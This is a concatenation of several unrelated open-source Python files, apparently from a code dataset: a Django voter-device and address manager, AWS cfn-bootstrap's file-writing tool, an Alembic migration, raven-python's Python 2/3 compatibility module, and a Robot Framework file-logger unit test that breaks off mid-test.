status = "DELETE_ALL_VOTER_DEVICE_LINKS_SUCCESSFUL"
success = True
else:
status = "DELETE_ALL_VOTER_DEVICE_LINKS-MISSING_VARIABLES"
success = False
except Exception as e:
status = "DELETE_ALL_VOTER_DEVICE_LINKS-DATABASE_DELETE_EXCEPTION"
success = False
results = {
'success': success,
'status': status,
}
return results
def delete_voter_device_link(self, voter_device_id):
try:
if positive_value_exists(voter_device_id):
VoterDeviceLink.objects.filter(voter_device_id=voter_device_id).delete()
status = "DELETE_VOTER_DEVICE_LINK_SUCCESSFUL"
success = True
else:
status = "DELETE_VOTER_DEVICE_LINK-MISSING_VARIABLES"
success = False
except Exception as e:
status = "DELETE_VOTER_DEVICE_LINK-DATABASE_DELETE_EXCEPTION"
success = False
results = {
'success': success,
'status': status,
}
return results
def retrieve_voter_device_link_from_voter_device_id(self, voter_device_id):
voter_id = 0
voter_device_link_id = 0
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id, voter_id, voter_device_link_id)
return results
def retrieve_voter_device_link(self, voter_device_id, voter_id=0, voter_device_link_id=0):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_device_link_on_stage = VoterDeviceLink()
try:
if positive_value_exists(voter_device_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(voter_device_id=voter_device_id)
voter_device_link_id = voter_device_link_on_stage.id
elif positive_value_exists(voter_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(voter_id=voter_id)
# If still here, we found an existing position
voter_device_link_id = voter_device_link_on_stage.id
elif positive_value_exists(voter_device_link_id):
voter_device_link_on_stage = VoterDeviceLink.objects.get(id=voter_device_link_id)
# If still here, we found an existing position
voter_device_link_id = voter_device_link_on_stage.id
else:
voter_device_link_id = 0
except VoterDeviceLink.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
except VoterDeviceLink.DoesNotExist:
error_result = True
exception_does_not_exist = True
results = {
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_device_link_found': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link_on_stage,
}
return results
def save_new_voter_device_link(self, voter_device_id, voter_id):
error_result = False
exception_record_not_saved = False
missing_required_variables = False
voter_device_link_on_stage = VoterDeviceLink()
voter_device_link_id = 0
try:
if positive_value_exists(voter_device_id) and positive_value_exists(voter_id):
voter_device_link_on_stage.voter_device_id = voter_device_id
voter_device_link_on_stage.voter_id = voter_id
voter_device_link_on_stage.save()
voter_device_link_id = voter_device_link_on_stage.id
else:
missing_required_variables = True
voter_device_link_id = 0
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
error_result = True
exception_record_not_saved = True
results = {
'error_result': error_result,
'missing_required_variables': missing_required_variables,
'RecordNotSaved': exception_record_not_saved,
'voter_device_link_created': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link_on_stage,
}
return results
def update_voter_device_link_with_election_id(self, voter_device_link, google_civic_election_id):
voter_object = None
return self.update_voter_device_link(voter_device_link, voter_object, google_civic_election_id)
def update_voter_device_link(self, voter_device_link, voter_object=None, google_civic_election_id=0):
"""
Update existing voter_device_link with a new voter_id or google_civic_election_id
"""
error_result = False
exception_record_not_saved = False
missing_required_variables = False
voter_device_link_id = 0
try:
if positive_value_exists(voter_device_link.voter_device_id):
if voter_object and positive_value_exists(voter_object.id):
voter_device_link.voter_id = voter_object.id
if positive_value_exists(google_civic_election_id):
voter_device_link.google_civic_election_id = google_civic_election_id
elif google_civic_election_id == 0:
# If set literally to 0, save it
voter_device_link.google_civic_election_id = 0
voter_device_link.save()
voter_device_link_id = voter_device_link.id
else:
missing_required_variables = True
voter_device_link_id = 0
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
error_result = True
exception_record_not_saved = True
results = {
'error_result': error_result,
'missing_required_variables': missing_required_variables,
'RecordNotSaved': exception_record_not_saved,
'voter_device_link_updated': True if voter_device_link_id > 0 else False,
'voter_device_link': voter_device_link,
}
return results
# This method *just* returns the voter_id or 0
def fetch_voter_id_from_voter_device_link(voter_device_id):
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link_from_voter_device_id(voter_device_id)
if results['voter_device_link_found']:
voter_device_link = results['voter_device_link']
return voter_device_link.voter_id
return 0
# This method *just* returns the voter_id or 0
def fetch_voter_id_from_voter_we_vote_id(we_vote_id):
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_we_vote_id(we_vote_id)
if results['voter_found']:
voter = results['voter']
return voter.id
return 0
# This method *just* returns the voter_we_vote_id or ""
def fetch_voter_we_vote_id_from_voter_id(voter_id):
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter = results['voter']
return voter.we_vote_id
return ""
def retrieve_voter_authority(request):
voter_api_device_id = get_voter_api_device_id(request)
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_from_voter_device_id(voter_api_device_id)
if results['voter_found']:
voter = results['voter']
authority_results = {
'voter_found': True,
'is_active': positive_value_exists(voter.is_active),
'is_admin': positive_value_exists(voter.is_admin),
'is_verified_volunteer': positive_value_exists(voter.is_verified_volunteer),
}
return authority_results
authority_results = {
'voter_found': False,
'is_active': False,
'is_admin': False,
'is_verified_volunteer': False,
}
return authority_results
def voter_has_authority(request, authority_required, authority_results=None):
if not authority_results:
authority_results = retrieve_voter_authority(request)
if not positive_value_exists(authority_results['is_active']):
return False
if 'admin' in authority_required:
if positive_value_exists(authority_results['is_admin']):
return True
if 'verified_volunteer' in authority_required:
if positive_value_exists(authority_results['is_verified_volunteer']) or \
positive_value_exists(authority_results['is_admin']):
return True
return False
# class VoterJurisdictionLink(models.Model):
# """
# All of the jurisdictions the Voter is in
# """
# voter = models.ForeignKey(Voter, null=False, blank=False, verbose_name='voter')
# jurisdiction = models.ForeignKey(Jurisdiction,
# null=False, blank=False, verbose_name="jurisdiction this voter votes in")
BALLOT_ADDRESS = 'B'
MAILING_ADDRESS = 'M'
FORMER_BALLOT_ADDRESS = 'F'
ADDRESS_TYPE_CHOICES = (
(BALLOT_ADDRESS, 'Address Where Registered to Vote'),
(MAILING_ADDRESS, 'Mailing Address'),
(FORMER_BALLOT_ADDRESS, 'Prior Address'),
)
class VoterAddress(models.Model):
"""
An address of a registered voter for ballot purposes.
"""
#
# We are relying on built-in Python id field
# The voter_id that owns this address
voter_id = models.BigIntegerField(verbose_name="voter unique identifier", null=False, blank=False, unique=False)
address_type = models.CharField(
verbose_name="type of address", max_length=1, choices=ADDRESS_TYPE_CHOICES, default=BALLOT_ADDRESS)
text_for_map_search = models.CharField(max_length=255, blank=False, null=False, verbose_name='address as entered')
latitude = models.CharField(max_length=255, blank=True, null=True, verbose_name='latitude returned from Google')
longitude = models.CharField(max_length=255, blank=True, null=True, verbose_name='longitude returned from Google')
normalized_line1 = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized address line 1 returned from Google')
normalized_line2 = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized address line 2 returned from Google')
normalized_city = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized city returned from Google')
normalized_state = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized state returned from Google')
normalized_zip = models.CharField(max_length=255, blank=True, null=True,
verbose_name='normalized zip returned from Google')
# This is the election_id last found for this address
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id for this address", null=True, unique=False)
# The last election day this address was used to retrieve a ballot
election_day_text = models.CharField(verbose_name="election day", max_length=255, null=True, blank=True)
refreshed_from_google = models.BooleanField(
verbose_name="have normalized fields been updated from Google since address change?", default=False)
class VoterAddressManager(models.Model):
def __unicode__(self):
return "VoterAddressManager"
def retrieve_ballot_address_from_voter_id(self, voter_id):
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_manager = VoterAddressManager()
return voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
def retrieve_ballot_map_text_from_voter_id(self, voter_id):
results = self.retrieve_ballot_address_from_voter_id(voter_id)
ballot_map_text = ''
if results['voter_address_found']:
voter_address = results['voter_address']
minimum_normalized_address_data_exists = positive_value_exists(
voter_address.normalized_city) or positive_value_exists(
voter_address.normalized_state) or positive_value_exists(voter_address.normalized_zip)
if minimum_normalized_address_data_exists:
ballot_map_text += voter_address.normalized_line1 \
if positive_value_exists(voter_address.normalized_line1) else ''
ballot_map_text += ", " \
if positive_value_exists(voter_address.normalized_line1) \
and positive_value_exists(voter_address.normalized_city) \
else ''
ballot_map_text += voter_address.normalized_city \
if positive_value_exists(voter_address.normalized_city) else ''
ballot_map_text += ", " \
if positive_value_exists(voter_address.normalized_city) \
and positive_value_exists(voter_address.normalized_state) \
else ''
ballot_map_text += voter_address.normalized_state \
if positive_value_exists(voter_address.normalized_state) else ''
ballot_map_text += " " + voter_address.normalized_zip \
if positive_value_exists(voter_address.normalized_zip) else ''
elif positive_value_exists(voter_address.text_for_map_search):
ballot_map_text += voter_address.text_for_map_search
return ballot_map_text
def retrieve_address(self, voter_address_id, voter_id=0, address_type=''):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_address_on_stage = VoterAddress()
voter_address_has_value = False
if not positive_value_exists(address_type):
# Provide a default
address_type = BALLOT_ADDRESS
try:
if positive_value_exists(voter_address_id):
voter_address_on_stage = VoterAddress.objects.get(id=voter_address_id)
voter_address_id = voter_address_on_stage.id
voter_address_found = True
status = "VOTER_ADDRESS_FOUND_BY_ID"
success = True
voter_address_has_value = True if positive_value_exists(voter_address_on_stage.text_for_map_search) \
else False
elif positive_value_exists(voter_id) and address_type in (BALLOT_ADDRESS, MAILING_ADDRESS,
FORMER_BALLOT_ADDRESS):
voter_address_on_stage = VoterAddress.objects.get(voter_id=voter_id, address_type=address_type)
# If still here, we found an existing address
voter_address_id = voter_address_on_stage.id
voter_address_found = True
status = "VOTER_ADDRESS_FOUND_BY_VOTER_ID_AND_ADDRESS_TYPE"
success = True
voter_address_has_value = True if positive_value_exists(voter_address_on_stage.text_for_map_search) \
else False
else:
voter_address_found = False
status = "VOTER_ADDRESS_NOT_FOUND-MISSING_REQUIRED_VARIABLES"
success = False
except VoterAddress.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
status = "VOTER_ADDRESS_MULTIPLE_OBJECTS_RETURNED"
exception_multiple_object_returned = True
success = False
voter_address_found = False
except VoterAddress.DoesNotExist:
error_result = True
status = "VOTER_ADDRESS_DOES_NOT_EXIST"
exception_does_not_exist = True
success = True
voter_address_found = False
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_address_found': voter_address_found,
'voter_address_has_value': voter_address_has_value,
'voter_address_id': voter_address_id,
'voter_address': voter_address_on_stage,
}
return results
# # TODO TEST THIS
# def retrieve_addresses(self, voter_id):
# error_result = False
# exception_does_not_exist = False
# # voter_addresses_on_stage = # How to typecast?
# number_of_addresses = 0
#
# try:
# if voter_id > 0:
# voter_addresses_on_stage = VoterAddress.objects.get(voter_id=voter_id)
# number_of_addresses = len(voter_addresses_on_stage)
# except VoterAddress.DoesNotExist:
# error_result = True
# exception_does_not_exist = True
#
# results = {
# 'error_result': error_result,
# 'DoesNotExist': exception_does_not_exist,
# 'voter_addresses_found': True if number_of_addresses > 0 else False,
# 'voter_addresses_on_stage': voter_addresses_on_stage,
# 'number_of_addresses': number_of_addresses,
# }
# return results
def update_or_create_voter_address(self, voter_id, address_type, raw_address_text):
"""
NOTE: This approach won't support multiple FORMER_BALLOT_ADDRESS
:param voter_id:
:param address_type:
:param raw_address_text:
:return:
"""
status = ''
exception_multiple_object_returned = False
new_address_created = False
voter_address_on_stage = None
voter_address_on_stage_found = False
if positive_value_exists(voter_id) and address_type in (BALLOT_ADDRESS, MAILING_ADDRESS, FORMER_BALLOT_ADDRESS):
try:
updated_values = {
# Values we search against
'voter_id': voter_id,
'address_type': address_type,
# The rest of the values are to be saved
'text_for_map_search': raw_address_text,
'latitude': None,
'longitude': None,
'normalized_line1': None,
'normalized_line2': None,
'normalized_city': None,
'normalized_state': None,
'normalized_zip': None,
# We clear out former values for these so voter_ballot_items_retrieve_for_api resets them
'refreshed_from_google': False,
'google_civic_election_id': 0,
'election_day_text': '',
}
voter_address_on_stage, new_address_created = VoterAddress.objects.update_or_create(
voter_id__exact=voter_id, address_type=address_type, defaults=updated_values)
voter_address_on_stage_found = voter_address_on_stage.id
success = True
except VoterAddress.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
success = False
status = 'MULTIPLE_MATCHING_ADDRESSES_FOUND'
exception_multiple_object_returned = True
else:
success = False
status = 'MISSING_VOTER_ID_OR_ADDRESS_TYPE'
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_address_saved': success,
'address_type': address_type,
'new_address_created': new_address_created,
'voter_address_found': voter_address_on_stage_found,
'voter_address': voter_address_on_stage,
}
return results
def update_voter_address_with_normalized_values(self, voter_id, voter_address_dict):
voter_address_id = 0
address_type = BALLOT_ADDRESS
results = self.retrieve_address(voter_address_id, voter_id, address_type)
if results['success']:
voter_address = results['voter_address']
try:
voter_address.normalized_line1 = voter_address_dict['line1']
voter_address.normalized_city = voter_address_dict['city']
voter_address.normalized_state = voter_address_dict['state']
voter_address.normalized_zip = voter_address_dict['zip']
voter_address.refreshed_from_google = True
voter_address.save()
status = "SAVED_VOTER_ADDRESS_WITH_NORMALIZED_VALUES"
success = True
except Exception as e:
status = "UNABLE_TO_SAVE_VOTER_ADDRESS_WITH_NORMALIZED_VALUES"
success = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing VoterAddress
status = "UNABLE_TO_FIND_VOTER_ADDRESS"
voter_address = VoterAddress() # TODO Finish this for "create new" case
success = False
results = {
'status': status,
'success': success,
'voter_address': voter_address,
}
return results
def update_existing_voter_address_object(self, voter_address_object):
results = self.retrieve_address(voter_address_object.id)
if results['success']:
try:
voter_address_object.save() # Save the incoming object
status = "UPDATED_EXISTING_VOTER_ADDRESS"
success = True
voter_address_found = True
except Exception as e:
status = "UNABLE_TO_UPDATE_EXISTING_VOTER_ADDRESS"
success = False
voter_address_found = False
handle_record_not_saved_exception(e, logger=logger, exception_message_optional=status)
else:
# If here, we were unable to find pre-existing VoterAddress
status = "UNABLE_TO_FIND_AND_UPDATE_VOTER_ADDRESS"
voter_address_object = None
success = False
voter_address_found = False
results = {
'status': status,
'success': success,
'voter_address': voter_address_object,
'voter_address_found': voter_address_found,
}
return results
def voter_setup(request):
"""
This is only used for sign in on the API server, and is not used for WebApp
:param request:
:return:
"""
generate_voter_api_device_id_if_needed = True
voter_api_device_id = get_voter_api_device_id(request, generate_voter_api_device_id_if_needed)
voter_id = 0
voter_id_found = False
store_new_voter_api_device_id_in_cookie = True
voter_device_link_manager = VoterDeviceLinkManager()
results = voter_device_link_manager.retrieve_voter_device_link_from_voter_device_id(voter_api_device_id)
if results['voter_device_link_found']:
voter_device_link = results['voter_device_link']
voter_id = voter_device_link.voter_id
voter_id_found = True if positive_value_exists(voter_id) else False
store_new_voter_api_device_id_in_cookie = False if positive_value_exists(voter_id_found) else True
# If existing voter not found, create a new voter
if not voter_id_found:
# Create a new voter and return the id
voter_manager = VoterManager()
results = voter_manager.create_voter()
if results['voter_created']:
voter = results['voter']
voter_id = voter.id
# Now save the voter_device_link
results = voter_device_link_manager.save_new_voter_device_link(voter_api_device_id, voter_id)
if results['voter_device_link_created']:
voter_device_link = results['voter_device_link']
voter_id = voter_device_link.voter_id
voter_id_found = True if voter_id > 0 else False
store_new_voter_api_device_id_in_cookie = True
else:
voter_id = 0
voter_id_found = False
final_results = {
'voter_id': voter_id,
'voter_api_device_id': voter_api_device_id,
'voter_id_found': voter_id_found,
'store_new_voter_api_device_id_in_cookie': store_new_voter_api_device_id_in_cookie,
}
return final_results
| bsd-3-clause | -5,296,734,359,636,039,000 | 42.612293 | 120 | 0.59179 | false |
siwater/Cloudworks | aws-cfn-bootstrap-1.3/cfnbootstrap/file_tool.py | 1 | 9622 | #==============================================================================
# Copyright 2011 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
from cfnbootstrap import security, util
from cfnbootstrap.construction_errors import ToolError
from contextlib import contextmanager
import base64
import logging
import os
import requests
import stat
_templates_supported = True
try:
from pystache.renderer import Renderer
except ImportError:
_templates_supported = False
try:
import simplejson as json
except ImportError:
import json
log = logging.getLogger("cfn.init")
class FileTool(object):
"""
Writes files to disk
"""
_compare_buffer = 8 * 1024
@classmethod
def is_same_file(cls, f1, f2):
if hasattr(os.path, "samefile"):
return os.path.samefile(f1, f2)
else:
#Crude workaround for os.path.samefile only existing on Unix
return os.path.normcase(os.path.abspath(f1)) == os.path.normcase(os.path.abspath(f2))
@classmethod
def compare_file_contents(cls, f1, f2):
"""
Return true if f1 and f2 have the same content.
"""
if os.path.getsize(f1) != os.path.getsize(f2):
return False
if cls.is_same_file(f1, f2):
return True
# Borrowed from filecmp
with file(f1, 'rb') as fp1:
with file(f2, 'rb') as fp2:
bufsize = 8 * 1024
while True:
b1 = fp1.read(bufsize)
b2 = fp2.read(bufsize)
if b1 != b2:
return False
if not b1:
return True
def apply(self, action, auth_config):
"""
Write a set of files to disk, returning a list of the files that have changed.
Arguments:
action -- a dict of pathname to attributes, such as owner, group, mode, content, and encoding
auth_config -- an AuthenticationConfig object for managing authenticated downloads
Exceptions:
ToolError -- on expected failures
"""
files_changed = []
if not action.keys():
log.debug("No files specified")
return files_changed
for (filename, attribs) in sorted(action.iteritems(), key=lambda pair: pair[0]):
if not os.path.isabs(filename):
raise ToolError('File specified with non-absolute path: %s' % filename)
# The only difference between a file and a symlink is hidden in the mode
file_is_link = "mode" in attribs and stat.S_ISLNK(int(attribs["mode"], 8))
if file_is_link:
if "content" not in attribs:
raise ToolError("Symbolic link specified without a destination")
elif os.path.exists(filename) and FileTool.is_same_file(os.path.realpath(filename), attribs["content"]):
log.info("Symbolic link %s already exists", filename)
continue
parent = os.path.dirname(filename)
if not os.path.isdir(parent):
if not os.path.exists(parent):
log.debug("Parent directory %s does not exist, creating", parent)
os.makedirs(parent)
else:
raise ToolError("Parent directory %s exists and is a file" % parent)
with self.backup(filename, files_changed):
if file_is_link:
log.debug("%s is specified as a symbolic link to %s", filename, attribs['content'])
os.symlink(attribs["content"], filename)
else:
file_is_text = 'content' in attribs and not self._is_base64(attribs)
with file(filename, 'w' + ('' if file_is_text else 'b')) as f:
log.debug("Writing content to %s", filename)
self._write_file(f, attribs, auth_config)
if "mode" in attribs:
log.debug("Setting mode for %s to %s", filename, attribs["mode"])
os.chmod(filename, stat.S_IMODE(int(attribs["mode"], 8)))
else:
log.debug("No mode specified for %s", filename)
security.set_owner_and_group(filename, attribs.get("owner"), attribs.get("group"))
return files_changed
@contextmanager
def backup(self, filename, files_changed):
backup_file = None
backup_backup_file = None
if os.path.exists(filename):
log.debug("%s already exists", filename)
backup_file = filename + '.bak'
if os.path.exists(backup_file):
backup_backup_file = backup_file + "2"
if os.path.exists(backup_backup_file):
os.remove(backup_backup_file)
self._backup_file(backup_file, backup_backup_file)
self._backup_file(filename, backup_file)
try:
yield backup_file
except Exception:
if backup_file:
try:
if os.path.exists(filename):
os.remove(filename)
self._backup_file(backup_file, filename)
if backup_backup_file:
self._backup_file(backup_backup_file, backup_file)
except ToolError, t:
log.warn("Error restoring %s from backup", filename)
raise
else:
linkmode = backup_file and os.path.islink(backup_file) or os.path.islink(filename)
# we assume any symbolic links changed because we short-circuit links to the same files early on
if not backup_file or linkmode or not FileTool.compare_file_contents(backup_file, filename):
files_changed.append(filename)
if backup_backup_file:
os.remove(backup_backup_file)
elif backup_file and backup_backup_file:
try:
self._backup_file(backup_backup_file, backup_file)
except ToolError, t:
log.warn("Error restoring backup file %s: %s", backup_file, str(t))
def _backup_file(self, source, dest):
try:
log.debug("Moving %s to %s", source, dest)
os.rename(source, dest)
except OSError, e:
log.error("Could not move %s to %s", source, dest)
raise ToolError("Could not rename %s: %s" % (source, str(e)))
def _is_base64(self, attribs):
return attribs.get("encoding", "plain") == "base64"
def _write_file(self, dest_fileobj, attribs, auth_config):
content = attribs.get("content", "")
if content:
self._write_inline_content(dest_fileobj, content, self._is_base64(attribs),
attribs.get('context'))
else:
source = attribs.get("source", "")
if not source:
raise ToolError("File specified without source or content")
log.debug("Retrieving contents from %s", source)
try:
self._write_remote_file(source, auth_config.get_auth(attribs.get('authentication', None)), dest_fileobj,
attribs.get('context'))
except IOError, e:
raise ToolError("Failed to retrieve %s: %s" % (source, e.strerror))
def _render_template(self, content, context):
if not _templates_supported:
raise ToolError("Pystache must be installed in order to render files as Mustache templates")
log.debug('Rendering as Mustache template')
try:
return Renderer(string_encoding='utf-8', file_encoding='utf-8').render(content, context)
except Exception, e:
raise ToolError("Failed to render content as a Mustache template: %s" % e.message)
@util.retry_on_failure()
def _write_remote_file(self, source, auth, dest, context):
opts = util.req_opts({'auth': auth})
remote_contents = util.EtagCheckedResponse(requests.get(source, **opts))
if context is None:
remote_contents.write_to(dest)
else:
dest.write(self._render_template(remote_contents.contents(), context))
def _write_inline_content(self, dest, content, is_base64, context):
if not isinstance(content, basestring):
log.debug('Content will be serialized as a JSON structure')
json.dump(content, dest)
return
if is_base64:
try:
log.debug("Decoding base64 content")
dest.write(base64.b64decode(content.strip()))
except TypeError:
raise ToolError("Malformed base64: %s" % content)
elif context is None:
dest.write(content)
else:
dest.write(self._render_template(content, context))
| mit | 8,430,033,312,722,759,000 | 38.760331 | 120 | 0.567242 | false |
matslindh/kimochi | alembic/versions/8f5b2066cbac_add_self_referential_image_reference.py | 1 | 2160 | """Add self-referential image reference
Revision ID: 8f5b2066cbac
Revises: 698cc06661d6
Create Date: 2016-03-20 19:35:31.321144
"""
# revision identifiers, used by Alembic.
revision = '8f5b2066cbac'
down_revision = '698cc06661d6'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('images', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_images_gallery_id'), ['gallery_id'], unique=False)
batch_op.create_index(batch_op.f('ix_images_site_id'), ['site_id'], unique=False)
batch_op.create_foreign_key('ix_images_parent_image_id', 'images', ['parent_image_id'], ['id'])
batch_op.create_foreign_key('ix_sites_site_id', 'sites', ['site_id'], ['id'])
batch_op.create_foreign_key('ix_galleries_gallery_id', 'galleries', ['gallery_id'], ['id'])
with op.batch_alter_table('pages_sections_layout_settings', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_pages_sections_layout_settings_page_section_id'), ['page_section_id'], unique=False)
with op.batch_alter_table('sites_settings', schema=None) as batch_op:
batch_op.drop_index('ix_sites_settings_site_id')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('sites_settings', schema=None) as batch_op:
batch_op.create_index('ix_sites_settings_site_id', ['site_id'], unique=False)
with op.batch_alter_table('pages_sections_layout_settings', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_pages_sections_layout_settings_page_section_id'))
with op.batch_alter_table('images', schema=None) as batch_op:
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_index(batch_op.f('ix_images_site_id'))
batch_op.drop_index(batch_op.f('ix_images_gallery_id'))
### end Alembic commands ###
| mit | 7,596,053,783,737,711,000 | 40.538462 | 129 | 0.678241 | false |
akalipetis/raven-python | raven/_compat.py | 1 | 5038 | """Utilities for writing code that runs on Python 2 and 3"""
# flake8: noqa
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import
import operator
import sys
import types
__author__ = "Benjamin Peterson <[email protected]>"
__version__ = "1.3.0"
PY2 = sys.version_info[0] == 2
if not PY2:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
if not PY2:
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
_iterlists = "lists"
else:
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
_iterlists = "iterlists"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
def iterkeys(d, **kw):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)(**kw))
def itervalues(d, **kw):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)(**kw))
def iteritems(d, **kw):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)(**kw))
def iterlists(d, **kw):
"""Return an iterator over the (key, [values]) pairs of a dictionary."""
return iter(getattr(d, _iterlists)(**kw))
if not PY2:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s): # NOQA
return s
def u(s): # NOQA
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
if not PY2:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
del builtins
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
def get_code(func):
rv = getattr(func, '__code__', getattr(func, 'func_code', None))
if rv is None:
raise TypeError('Could not get code from %r' % type(func).__name__)
return rv
| bsd-3-clause | -442,859,743,706,172,900 | 26.380435 | 82 | 0.618499 | false |
moto-timo/robotframework | utest/output/test_filelogger.py | 1 | 1867 | import unittest
import time
from robot.output.filelogger import FileLogger
from robot.utils import StringIO, robottime
from robot.utils.asserts import *
from robot.utils.robottime import TimestampCache
class _FakeTimeCache(TimestampCache):
def __init__(self):
self.fake = time.mktime((2006, 6, 13, 8, 37, 42, 0, 0, 1)) + 0.123
TimestampCache.__init__(self)
def _get_epoch(self):
return self.fake
class TestFileLogger(unittest.TestCase):
def setUp(self):
robottime.TIMESTAMP_CACHE = _FakeTimeCache()
FileLogger._get_writer = lambda *args: StringIO()
self.logger = FileLogger('whatever', 'INFO')
def tearDown(self):
robottime.TIMESTAMP_CACHE = TimestampCache()
def test_write(self):
self.logger.write('my message', 'INFO')
expected = '20060613 08:37:42.123 | INFO | my message\n'
self._verify_message(expected)
self.logger.write('my 2nd msg\nwith 2 lines', 'ERROR')
expected += '20060613 08:37:42.123 | ERROR | my 2nd msg\nwith 2 lines\n'
self._verify_message(expected)
def test_write_helpers(self):
self.logger.info('my message')
expected = '20060613 08:37:42.123 | INFO | my message\n'
self._verify_message(expected)
self.logger.warn('my 2nd msg\nwith 2 lines')
expected += '20060613 08:37:42.123 | WARN | my 2nd msg\nwith 2 lines\n'
self._verify_message(expected)
def test_set_level(self):
self.logger.write('msg', 'DEBUG')
self._verify_message('')
self.logger.set_level('DEBUG')
